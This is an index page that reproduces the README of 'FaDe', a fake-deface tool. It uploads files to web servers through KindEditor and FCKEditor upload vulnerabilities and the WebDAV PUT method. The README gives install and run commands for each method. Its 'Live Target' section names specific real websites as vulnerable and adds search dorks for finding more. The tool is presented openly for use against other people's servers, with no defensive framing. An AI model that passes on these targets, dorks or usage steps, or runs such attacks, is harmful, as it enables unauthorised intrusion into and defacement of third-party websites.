Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Gameye98/FaDe

Fake Deface
https://github.com/Gameye98/FaDe

Last synced: 2 months ago
JSON representation

Fake Deface

Awesome Lists containing this project

README

        

# FaDe
Fake deface with kindeditor, fckeditor and webdav is only add new files to the server, without touching anything on the server.

## Method
~ KindEditor - upload files on the server with remote file upload exploit

~ FCKEditor - fckeditor all version arbitary vulnerability

~ WebDAV - webdav file upload exploiter uses the PUT method that allows clients to upload and replace files on the server

## Screenshot

## Installation and Using FaDe
```
apt-get install git python python-requests
```
```
git clone https://github.com/Gameye98/FaDe
```
```
python fade.py --method=method_name --file=
```

## Example
```
fade --method=kindeditor --file=/path/example.png
```
```
fade --method=fckeditor --file=/path/example.html
```
```
fade --method=webdav --file=/path/example.html
```

## Live Target
```
KindEditor: http://www.nb-medicalsystem.com/kindeditor/examples/uploadbutton.html
Dork: inurl:/uploadbutton.html
```
```
FCKEditor: http://amarantenet.com.br/portal/editor/editor/filemanager/upload/test.html
Dork: inurl:/editor/editor/filemanager
```
```
WebDAV: http://ladesignstudio.co.za
Dork: intext:"(IIS)" ext:asp site:co.za
```

## Contact Me
Line : dtl.lily

Telegram : @dtlily

Facebook : cgi.izo